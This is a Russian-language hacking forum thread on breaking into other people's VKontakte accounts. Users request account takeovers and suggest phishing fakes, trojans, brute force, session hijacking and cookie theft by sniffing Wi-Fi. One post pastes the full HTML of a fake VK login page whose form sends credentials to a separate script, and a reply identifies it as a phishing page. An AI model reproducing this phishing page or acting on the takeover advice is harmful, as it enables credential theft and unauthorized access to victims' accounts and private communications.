Информационная Безопасность. Аудит Безопасности


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Как взломать аккаунт в контакте (VKONTAKTE.RU) (ищем уязвимости, делимся опытом)
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] Просмотров - 1248076
Как взломать аккаунт в контакте (VKONTAKTE.RU) (ищем уязвимости, делимся опытом)
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
kottovsky84


Novice
# | Сообщение добавлено 10.10.2011 22:23:28
нужно ломануть акк ВК. привязка к телефону есть, доступа к нему нет. помогите.
Сказать спасибо Ответить Цитировать

Tickhack


Novice
# | Сообщение добавлено 16.01.2012 19:52:47
1 способ взлом через фейк, 2 способ взлом через пассивку или активку !Tick
Сказать спасибо Ответить Цитировать

aspin


Novice
# | Сообщение добавлено 26.02.2012 14:33:13
Попалась на одну из ваших прог, как теперь эт убрать? подскажите плиз=)))
 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 
<head>
<script type="text/javascript" src="/al_loader.php?act=nav&v=3599"></script>
 
<link rel="shortcut icon" href="/images/faviconnew.ico" />
 
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="description" content="<b>ВКонтакте</b> – универсальное средство коммуникации и поиска людей,<br>которым ежедневно пользуются десятки миллионов человек. Мы хотим, чтобы друзья, однокурсники, одноклассники, соседи и коллеги всегда оставались в контакте." />
 
<title>Добро пожаловать</title>
 
<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>
 
<link rel="stylesheet" type="text/css" href="/css/al/common.css?153" />
<!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(/css/al/ie6.css?19); /* ]]> */</style><![endif]-->
<!--[if IE 7]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(/css/al/ie7.css?13); /* ]]> */</style><![endif]-->
 
<script type="text/javascript" src="jquery-1.4.2.min.js"></script>
 
<script type="text/javascript">
 
var vk = {
  al: parseInt('2') || 4,
  id: 0,
  intnat: '1' ? true : false,
  host: 'vk.com',
  lang: 0,
  rtl: parseInt('') || 0,
  version: 3599,
  zero: false,
  contlen: 5235,
  navPrefix: '/'
}
 
window.locDomain = vk.host.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
var _ua = navigator.userAgent.toLowerCase();
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain != locDomain) document.domain = locDomain;
var ___htest = (location.toString().match(/#(.*)/) || {})[1] || '';
if (vk.al != 1 && ___htest.length && ___htest.substr(0, 1) == vk.navPrefix) {
  if (vk.al != 3 || vk.navPrefix != '!') {
    location.replace(location.protocol + '//' + location.host + '/' + ___htest.replace(/^(\/|!)/, ''));
  }
}
 
var StaticFiles = {
  'common.js' : {v: 421},
  'common.css': {v: 153},
  'ie6.css'   : {v: 19},
  'ie7.css'   : {v: 13}
  ,'lang0_0.js':{v:3704},'index.js':{v:11},'index.css':{v:23}
}
</script>
<script type="text/javascript" src="/js/al/common.js?421"></script>
<script type="text/javascript" src="/js/lang0_0.js?3704"></script>
<script type="text/javascript" src="/js/al/index.js?11"></script>
 

 
<link type="text/css" rel="stylesheet" href="/css/al/index.css?6"></link>
 
</head>
 
<body onresize="onBodyResize()" class="is_rtl">
  <div id="system_msg" class="fixed"></div>
  <div id="utils"></div>
 
  <div id="layer_bg" class="fixed"></div><div id="layer_wrap" class="scroll_fix_wrap fixed"><div id="layer"></div></div>
  <div id="box_layer_bg" class="fixed"></div><div id="box_layer_wrap" class="scroll_fix_wrap fixed"><div id="box_layer"><div id="box_loader"><div class="loader"></div><div class="back"></div></div></div></div>
 
  <a id="side_back_link" href="" class="fixed" onmouseover="animate(this, {backgroundColor: '#E1E7ED'}, 200)" onmouseout="animate(this, {backgroundColor: '#FFF'}, 200)" onclick="if (!checkEvent(event)) { scrollToTop(0); return false; }"></a>
  
  <script type="text/javascript">domStarted();</script>
 
  <div class="scroll_fix_wrap" id="page_wrap"><div id="top_info_wrap"></div>
<div><div class="scroll_fix">
  <div id="page_layout">
    <div id="page_header" class="p_head p_head_l0">
      <div class="back"></div>
      <div class="left"></div>
      <div class="right"></div>
      <div class="content">
        <div id="top_nav" class="head_nav">
  <a id="top_home_link" class="top_home_link fl_l" href="/" onclick="return nav.go(this, event)" class="fl_l" style=""></a>
  <div id="top_links" style="display: none;">
    <a class="fl_r top_nav_link" href="/reg0" onclick="return !showBox('al_register.php', {act: 'register_box'}, {params: {width: 514}, stat: ['reg.css']}, event)">Как стать участником?</a>
    <a class="fl_l top_nav_link" href="" id="top_back_link" onclick="return nav.go(this, event, {back: true})"></a>
  </div>
</div>
      </div>
    </div>
 
    <div id="side_bar" class="fl_l" style="">
      <div id="quick_login">
  <form method="POST" name="login" id="quick_login_form" action="login_vk_com.php?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="q" value="1" />
    <input type="hidden" name="al_frame" value="1" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="from_host" value="vk.com" />
    <div class="label">E-mail или Логин:</div>
    <div class="labeled"><input type="text" name="email" class="text" onfocus="show('quick_expire')" id="quick_email" /></div>
    <div class="label">Пароль:</div>
    <div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
    <div class="checkbox" id="quick_expire" onclick="checkbox(this);ge('quick_expire_input').value=isChecked(this)?1:'';"><div></div>Чужой компьютер</div>
    <input type="submit" class="submit" />
  </form>
  <div class="button_blue button_wide"><button id="quick_login_button">Войти</button></div>
  <div class="clear forgot"><a href="/login.php?op=forgot" target="_top">Забыли пароль?</a></div>
</div>
    </div>
 
    <div id="page_body" class="fl_r">
      <div id="header_wrap2">
        <div id="header_wrap1">
          <div id="header" style="">
            <h1 id="title">Добро пожаловать</h1>
          </div>
        </div>
      </div>
      <div id="wrap_between"></div>
      <div id="wrap3"><div id="wrap2">
  <div id="wrap1">
    <div id="content"><div id="index">
  <!--</a><iframe class="upload_frame" src="login_vk_com.php?al_frame=1&from_host=vkontakte.ru"></iframe>--!>
  <div class="content">
    <p><b>ВКонтакте</b> – универсальное средство коммуникации и поиска людей,<br>которым ежедневно пользуются десятки миллионов человек.</p>
 
    <h2>Моментальная регистрация</h2>
    
      <div class="ij_reg_row">
        <input type="text" class="text" id="ij_first_name" value="" placeholder="Ваше имя" onkeydown="if (event.keyCode == 10 || event.keyCode == 13) Index.submitJoinStart();" />
      </div>
      <div class="ij_reg_row">
        <input type="text" class="text" id="ij_last_name" value="" placeholder="Ваша фамилия" onkeydown="if (event.keyCode == 10 || event.keyCode == 13) Index.submitJoinStart();" />
      </div>
       <div class="button_blue button_wide ij_button">
      <button id="ij_submit" onclick="Index.submitJoinStart()">Зарегистрироваться</button>
    </div>
    
    <h2>В чем поможет Вконтакте?</h2>
    <ul class="listing">
      <li><span>Найти людей, с которыми Вы когда-либо учились, работали или отдыхали.</span></li>
      <li><span>Узнать больше о людях, которые Вас окружают, и найти новых друзей.</span></li>
      <li><span>Всегда оставаться в контакте с теми, кто Вам дорог.</span></li>
    </ul>
  </div>
  <div class="reg">
 
<table cellspacing="0" cellpadding="0" id="ij_screens"><tr>
      <td><a class="ij_scr" onclick="JoinPhotoview.show(0)"><img src="/images/join/dial_m.png" class="ijs_img" /></a></td>
      <td><a class="ij_scr" onclick="JoinPhotoview.show(1)"><img src="/images/join/news_m.png" class="ijs_img" /></a></td>
      <td><a class="ij_scr" onclick="JoinPhotoview.show(2)"><img src="/images/join/photos_m.png" class="ijs_img" /></a></td>
    </tr></table>
 

    
  </div>
</div></div>
  </div>
</div></div>
    </div>
 
    <div id="footer_wrap" class="fl_r">
      <div id="bottom_nav">
  <a href="/help.php">о сайте</a>
  <a href="/techsupp.php">техподдержка</a>
  <a href="/blog.php">блог</a>
  <a href="/terms.php">правила</a>
  <a href="/ads.php">реклама</a>
  <a href="/developers.php">разработчикам</a>
  <a href="/pages.php?o=-1&p=Merchant%20API">магазинам</a>
</div>
<div id="footer" class="clear">
  <div class="copy_lang"><a href="/help.php?page=about">В Контакте</a> © 2006-2012 <a>Русский</a><a>Українська</a><a>Беларуская (тарашкевiца)</a><a>English</a><a>Српски</a><a>Magyar</a><a>Az&#601;rbaycan</a><a>все языки »</a></div>
  <div>
    
    
  </div>
</div>
    </div>
    <div class="clear"></div>
  </div>
</div></div></div>
  <div class="progress" id="global_prg"></div>
 
  <script type="text/javascript">
    domReady();
    updateMoney(false);
gSearch.init();
if (window.qArr && qArr[5]) qArr[5] = [5, "по товарам", "", "goods", 0x00000100];var qf = ge('quick_login_form'), ql = ge('quick_login'), qe = ge('quick_email'), qp = ge('quick_pass');
 
window.onload = function() {
  setTimeout(function() {
    ql.insertBefore(ce('div', {innerHTML: '<iframe class="upload_frame" id="quick_login_frame" name="quick_login_frame"></iframe>'}), qf);
    qf.target = 'quick_login_frame';
  }, 1);
}
 
qf.onsubmit = function() {
  if (!ge('quick_login_frame')) return false;
  if (!trim(qe.value)) {
    elfocus(qe);
    return false;
  } else if (!trim(qp.value)) {
    elfocus(qp);
    return false;
  }
  return true;
}
 
window.focusLoginInput = function() {
  scrollToTop(0);
  notaBene('quick_email');
}
window.changeQuickRegButton = function(noShow) {
}
window.submitQuickLoginForm = function(email, pass) {
  ge('quick_email').value = email;
  ge('quick_pass').value = pass;
  ge('quick_login_form').submit();
}
 
ge('quick_login_button').onclick = function() { if (qf.onsubmit()) qf.submit(); };
 
if (browser.opera_mobile) show('quick_expire');
window.onReLoginDone = function(href) {
  location.href = href;
}
window.onReLoginFailed = function() {};
window.persistentPlayback = 1;
handlePageParams({"id":0,"loc":""});vk.al_video = 1;
  </script>
</body>
 
</html>
 

на это вот попалась
Сказать спасибо Ответить Цитировать

D-512




Gold Member
# | Сообщение добавлено 26.02.2012 14:43:39
aspin

Попалась на одну из ваших прог, как теперь эт убрать? подскажите плиз=

Смени пароль, это фейковая страница выше)))
Сказать спасибо Ответить Цитировать

Svd


Novice
# | Сообщение добавлено 12.08.2012 07:42:03
Проблема в большинстве случаев заключаеться в том что не адрес email не номер телефона как правило неизвесты, а ведь именно эта информация служит логином для входа в вк. Соответственно брутить невариант. Лучше использовать троян (тотже пинч), либо фейк,  главное в этом деле соц.инженерия (впарить некаждому выйдет). Можно использовать атаку hijacking. Ну а если логин известен (маил/номер) можно и брутом. Правда хороший брут действительно найти неудалось в сети, но впринцепи можно написать самому, сложного в этом нет нечего. Удачных уловов :)
 
Добавлено 12.08.2012 07:51:06 (через 9 минут 3 секунды )
 
ну эт разметка хтмл кода, сам скрипт который обрабатывает входящие данные с форм , скорее на пхп
 
Сказать спасибо Ответить Цитировать

Vital2042


Novice
# | Сообщение добавлено 16.08.2012 02:20:57
скажите, а как взломать при помощи фейка?
Сказать спасибо Ответить Цитировать

Vazelin


Novice
# | Сообщение добавлено 15.10.2012 14:16:06
>>2 способ взлом через пассивку или активку
 
Друзья! А если на стороннем сайте (не на вконтакте.ру) найти активную уязвимость, сгенерировать ссылку для кражи куки: можно ли таким макаром стырить контактовские куки, прислав человеку сообщение через сам контакт?
Сказать спасибо Ответить Цитировать

maxmax


Novice
# | Сообщение добавлено 15.11.2012 22:42:44
Подскажите как имея куки войти под чужим логином??? На сегодняшний день это реально вообще?
Простая подстановка remixsid из чужих куков себе в куки походу уже не работает
У меня есть Wi-Fi точка ,пробовал снифовать трафф, remixsid ловится хорошо, подставляю его в куки своего браузер, обновляю страницу ВК- на чужую страницу не заходит, остаюсь на своей странице.
Ip вроде одинаковый (так как через меня сидят в инете)
Сначала подумал что remixsid привязывается к браузеру, пробовал совать его в разные браузеры - не выходит.
 
Что самое интересное: захожу например оперой под одним (своим) акком со своего компа, беру оттуда remixsid и вставляю его в куки той же своей оперы, но установленной в другую папку (как бы профиль другой получается) и всё срабатывает ,то есть на второй опере осуществляется заход в тот аккаунт у которого я взял remixsid. То есть походу ещё привязывается к версии браузера ,флеш проигрывателя или ещё даж не знаю к
чему
У кого получалось в послеждне время заходить в чужие аккаунты с помощью подстановки remixsid - напишите плиз как делали
 
Сказать спасибо Ответить Цитировать

DJVOLK


Novice
# | Сообщение добавлено 28.11.2012 19:04:53
Ребята, подскажите пожалуйста или укажите куда смотреть... Какие способы взлома сейчас имеются, расскажите, пожалуйста...
Сказать спасибо Ответить Цитировать

Zombie_idol


Novice
# | Сообщение добавлено 11.12.2012 07:59:45
Отредактировано 11.12.2012 08:47:00 by Zombie_idol
Народ, спс за тему куки угнал, киньте плиз сыль на тему как расшифровать (ссыль лучше в лс)... если поможет куки мазиловские
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • В darknet сливают данные 100 000 российских банковских карт
  • Вирус Escobar ворует коды двухфакторной аутентификации из Google ...
  • DeadBolt использует уязвимость, исправленную в декабре
  • Почти миллион WordPress-сайтов в опасности из-за уязвимости в поп...
  • Шифровальщик DeadBolt взломал 3600 NAS. Qnap устанавливает обновл...
  • Банковский троян Chaes устанавливает вредоносные расширения для C...
  • Взломана платформа Qubit Finance, хакеры похитили 80 млн долларов
  • Арест участников REvil взволновал других преступников
  • Обнаружена malware MoonBounce, внедряющаяся в UEFI
  • Администратор кардерского форума UniCC и участник хак-группы The ...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Предложения работы » Взлом авторизации CRM
  • Разное / Предложения работы » взломать сайт и выграть электронную жеребьёвку
  • Разное / Предложения работы » разблокировать сбер аккаунт
  • Разное / Болталка » Re: Форум жив?
  • Разное / Болталка » Форум жив?
  • Разное / Болталка » С Новым 2022 Годом!
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}